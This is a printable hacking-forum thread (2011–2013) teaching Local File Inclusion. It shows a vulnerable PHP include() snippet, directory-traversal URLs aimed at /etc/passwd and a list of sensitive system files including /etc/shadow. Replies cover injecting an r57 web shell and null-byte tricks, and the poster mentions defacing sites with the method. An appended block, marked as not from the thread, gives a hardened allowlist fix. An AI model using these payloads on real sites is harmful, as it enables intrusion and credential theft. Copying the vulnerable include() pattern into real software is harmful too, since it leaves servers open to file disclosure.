Local File Inclusion (LFI) - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: Local File Inclusion (LFI) (/Thread-Local-File-Incusion-LFI)
Local File Inclusion (LFI) - *The ALLSTAR* - 05-04-2011

Local File Inclusion is a common website hacking trick. This tutorial will show you how to exploit a website using LFI. First of all, take a look at the given PHP code.

```php
<?php
// Vulnerable: the request parameter is passed to include() unchecked
$page = $_GET['page'];
include($page);
?>
```

The code given above is generally used on many websites by web developers, and it should not be used, because $page isn't sanitized and is passed directly to the webpage. This code is used by hackers for LFI.

In general, you have seen many URLs like this:

www.site.com/index.php?page=products.php

The value passed through the query string is used to include the products.php page by the PHP code given above, without checking the proper format of the value inserted in the URL. Suppose we inserted the URL like this:

www.site.com/index.php?page=mypage.php

This mypage.php does not exist on the server, so it will show a PHP error message on the webpage:

Warning: include() [function.include]: Failed opening 'mypage.php' for inclusion.........

Here we go, we know this is vulnerable. If this website is hosted on a Unix server, then we might be able to do a directory traversal to the password file. The etc/passwd is where the users/passwords are stored.

www.mywebsite.com/index.php?page=../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd
http://www.mywebsite.com/index.php?p.../../etc/passwd

Try adding ../ till you get access to the passwd file. Note one thing here: if the URL is like this,

www.site.com/index.php?page=products

then it means that the PHP code is adding the page extension manually. So the PHP code is like this:

```php
<?php
// Vulnerable: the code appends the extension to the unchecked parameter
$page = $_GET['page'];
include($page.'php');
?>
```

in this case use for null extension at last.

www.site.com/index.php?page=../etc/passwd
www.site.com/index.php?page=../../../etc/passwd
http://www.site.com/index.php?page=..../../etc/passwd

and so on. After some effort you will be able to get the content of the password file.
You can also view:

etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

These files will also give you some useful information about the server system.

Counter Measures

1. Use the latest web server software
2. Effectively filter the user's input

RE: Local File Inclusion (LFI) - jalal77 - 05-04-2011

Hey dude, we will find the etc/pwd file, but you didn't explain one thing... how to read that password file? It will not be in clear text... just explain here also how to read the password.

RE: Local File Inclusion (LFI) - *The ALLSTAR* - 05-05-2011

The pass is generally in md5, but when you see the vulnerability working you need to inject a shell like r57.

RE: Local File Inclusion (LFI) - 1234hotmaster - 05-05-2011

btw you forgot the

Quote: please comment below if this post is useful for you..

RE: Local File Inclusion (LFI) - Coder-san - 05-05-2011

@*The ALLSTAR*: Please credit the original author.

RE: Local File Inclusion (LFI) - *The ALLSTAR* - 05-05-2011

To tell you, in fact even I don't know who the original author is. I found a WordPress blog back in 2009. I am able to deface a couple of sites regarding this and many other tutorials in my collection. That's why I'm not taking any credit, but it is very helpful. Whoever wrote this code, I thank you, whoever the dude may be. I hope it will help you out! But with only this tutorial it is almost useless; I recommend everyone to know how to tamper data. If you still have more questions, feel free to ask here.

RE: Local File Inclusion (LFI) - The Alchemist - 04-26-2012

Great tutorial, whoever the original author is..

RE: Local File Inclusion (LFI) - vikler - 07-28-2013

Nice tutorial, but can anyone help me on how to upload shell if I don't have access to /proc/self/environ ?

RE: Local File Inclusion (LFI) - zomgwtfbbq - 07-28-2013

First of all, I think I've already seen a FI tutorial here, and not just one.
Second, this wouldn't work on Win OS.

Third, it's not necessary to keep adding ../ until you find root; just append 10 dir ups, if you exceed it, it will still be going to root.

Fourth:

Quote: http://www.site.com/index.php?page=products

Should be:

```php
<?php
// Note the dot: the appended extension is '.php'
$page = $_GET['page'];
include($page.'.php');
?>
```

Also, you could have explained about the poison null byte in order to exploit this: http://hakipedia.com/index.php/Poison_Null_Byte

Last but not least, it's incredibly rude that you steal others' work and act like you created it by yourself.
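Added example, not part of the thread and not written by any of its posters: the first post's countermeasure "Effectively filter the user's input" made concrete, as a hardened form of the `include($page)` snippet. The `pages/` directory, the page names and the function name `resolve_page` are assumptions chosen for illustration; the code needs PHP 8.0 or later.

```php
<?php
declare(strict_types=1);

// Assumed layout: page templates live in ./pages next to this script.
const PAGE_DIR = __DIR__ . '/pages';

// Allowlist: request value => file on disk. Nothing from the request ever
// becomes part of a path, so "../" sequences, absolute paths and null bytes
// have nothing to act on.
const PAGES = [
    'home'     => 'home.php',
    'products' => 'products.php',
    'contact'  => 'contact.php',
];

/**
 * Map the untrusted ?page= value to a file path, or null if it is not allowed.
 */
function resolve_page(mixed $requested): ?string
{
    // ?page[]=x arrives as an array; only plain strings are considered.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    // Defence in depth: the resolved file must still sit inside PAGE_DIR
    // (catches a symlink or a mistaken allowlist entry).
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    if ($base === false || $path === false
        || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;
    }
    return $path;
}

$path = resolve_page($_GET['page'] ?? 'home');
if ($path === null) {
    // Generic 404 instead of an include() warning that exposes file paths;
    // the rejected value is logged (JSON-escaped) for later review.
    http_response_code(404);
    error_log('rejected page parameter: ' . json_encode($_GET['page'] ?? null));
    exit('Page not found');
}
include $path;
```

Repeated entries in the error log from this check are a useful detection signal, since legitimate links only ever send the allowlisted names.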